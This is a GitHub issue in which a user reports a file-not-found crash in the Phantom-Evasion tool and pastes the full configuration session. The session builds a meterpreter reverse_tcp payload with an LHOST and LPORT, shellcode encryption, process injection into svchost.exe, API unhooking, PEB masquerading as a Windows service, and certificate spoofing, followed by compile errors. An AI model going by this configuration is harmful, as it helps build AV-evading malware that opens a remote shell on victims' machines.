Skip to content
This repository has been archived by the owner on Nov 6, 2023. It is now read-only.

os.rename(Filename,Tmpfile) FileNotFoundError: [Errno 2] No such file or directory #82

Open
digilevi2006 opened this issue Sep 4, 2020 · 0 comments
Open

os.rename(Filename,Tmpfile) FileNotFoundError: [Errno 2] No such file or directory #82

digilevi2006 opened this issue Sep 4, 2020 · 0 comments

Comments

@digilevi2006
Copy link

digilevi2006 commented Sep 4, 2020
edited

Hi Everyone,

It's my first time here and I think Phantom is great!!!

But when I go to the part 'myexe.exe' -> 'Ready2Sign.exe', it throws me the error. What should I do? Thanks.

Edit:
I've commented out the os.remove(Tmpfile) because I was thinking it removes the file before signing it but it's the same error.
By the way, I'm on Parrot. Thanks....

Here is the steps I did,


[+] MODULE DESCRIPTION:

  Inject and execute shellcode 
  [>] Local process shellcode execution type:
   > Thread                            
   > APC                               

  [>] Remote process shellcode execution type:
   > ThreadExecutionHijack       (TEH) 
   > Processinject               (PI)  
   > APCSpray                    (APCS)
   > EarlyBird                   (EB) 
   > EntryPointHijack            (EPH)

  [>] Local Memory allocation type:
   > Virtual_RWX                     
   > Virtual_RW/RX                   
   > Virtual_RW/RWX                  
   > Heap_RWX                        

  [>] Remote Memory allocation type:
   > Virtual_RWX                     
   > Virtual_RW/RX                   
   > Virtual_RW/RWX                  
   > SharedSection                   

  [>] Shellcode Encryption supported 
  [>] Shellcode can be embedded as resource
  [>] AUTOCOMPILE format: exe,dll 


  Press Enter to continue: 

[>] Insert Target architecture (default:x86):

[>] Insert shell generation method (default: msfvenom):

[>] Embed shellcode as PE resource? (Y/n): y

[>] Insert msfvenom payload (default: windows/meterpreter/reverse_tcp):

[>] Insert LHOST: 192.168.56.105

[>] Insert LPORT: 2357

[>] Custom msfvenom options(default: empty): 

[>] Payload encryption

[1] none                

[2] Xor                 

[3] Double-key Xor      

[4] Vigenere            

[5] Double-key Vigenere 


[>] Select encoding option: 5

[>] Insert Exec-method (default:Thread):EPH

[>] Insert Memory allocation type (default:Virtual_RWX):Virtual_RW/RWX

[>] Insert target process filepath (default: svchost.exe):

[>] Insert Junkcode Intesity value (default:10):7

[>] Insert Junkcode Frequency value  (default: 10):7

[>] Insert Junkcode Reinjection Frequency (default: 0):1

[>] Insert Evasioncode Frequency value  (default: 10):7

[>] Dynamically load windows API? (Y/n):y

[>] Add Ntdll api Unhooker? (Y/n):y

[>] Masq peb process? (Y/n):y

[>] Insert fake process path?(default:C:\windows\system32\notepad.exe):C:\Windows\System32\SecurityHealthService.exe

[>] Insert fake process commandline?(default:empty):

[>] Strip executable? (Y/n):n

[>] Use certificate spoofer and sign executable? (Y/n):y

[>] Insert url target for certificate spoofer (default:www.windows.com:443):

[>] Insert certificate description (default:Notepad Benchmark Util):

[>] Insert output format (default:exe):

[>] Insert output filename:asdf

[>] Generating code...

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of c file: 1512 bytes
[>] Double-key Vigenere encryption...


[>] Compiling...

Source.c: In function ‘main’:
Source.c:5208:89: warning: unknown escape sequence: '\W'
 5208 | QVINfEYoKeCBbErm->CommandLine.pBuffer = L"C:\Windows\System32\SecurityHealthService.exe";
      |                                                                                         ^
Source.c:5208:89: warning: unknown escape sequence: '\S'
Source.c:5208:89: warning: unknown escape sequence: '\S'
Source.c:5209:91: warning: unknown escape sequence: '\W'
 5209 | QVINfEYoKeCBbErm->ImagePathName.pBuffer = L"C:\Windows\System32\SecurityHealthService.exe";
      |                                                                                           ^
Source.c:5209:91: warning: unknown escape sequence: '\S'
Source.c:5209:91: warning: unknown escape sequence: '\S'
Source.c:52453:11: warning: dereferencing ‘void *’ pointer
52453 | WopOwICDVp[onupsgykxdf]  = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
      |           ^
Source.c:52453:56: warning: dereferencing ‘void *’ pointer
52453 | WopOwICDVp[onupsgykxdf]  = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
      |                                                        ^
Source.c:52453:56: error: void value not ignored as it ought to be
52453 | WopOwICDVp[onupsgykxdf]  = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
      |                                              ~~~~~~~~~~^~~~~~~~~~~~~
Source.c:52453:26: error: invalid use of void expression
52453 | WopOwICDVp[onupsgykxdf]  = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
      |                          ^
Source.c:52456:11: warning: dereferencing ‘void *’ pointer
52456 | WopOwICDVp[onupsgykxdf]  = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
      |           ^
Source.c:52456:56: warning: dereferencing ‘void *’ pointer
52456 | WopOwICDVp[onupsgykxdf]  = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
      |                                                        ^
Source.c:52456:56: error: void value not ignored as it ought to be
52456 | WopOwICDVp[onupsgykxdf]  = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
      |                                              ~~~~~~~~~~^~~~~~~~~~~~~
Source.c:52456:26: error: invalid use of void expression
52456 | WopOwICDVp[onupsgykxdf]  = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
      |                          ^

[>] Sign Executable 

Traceback (most recent call last):
  File "phantom-evasion.py", line 402, in <module>
    CompleteMenu()
  File "phantom-evasion.py", line 125, in CompleteMenu
    Phantom_lib.ModuleLauncher(module_type)
  File "Setup/Phantom_lib.py", line 964, in ModuleLauncher
    ExeSigner(ModOpt["Outfile"],ModOpt["SpoofCert"],ModOpt["descr"])
  File "Setup/Phantom_lib.py", line 455, in ExeSigner
    os.rename(Filename,Tmpfile)
FileNotFoundError: [Errno 2] No such file or directory: 'asdf.exe' -> 'Ready2Sign.exe'

if I do this:

[>] Use certificate spoofer and sign executable? (Y/n):n

gives me file not found error also, no exe or bin generated...

I also tried to re-do the setup and I saw one package not installed, STRIP.

E: Unable to locate package strip
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@digilevi2006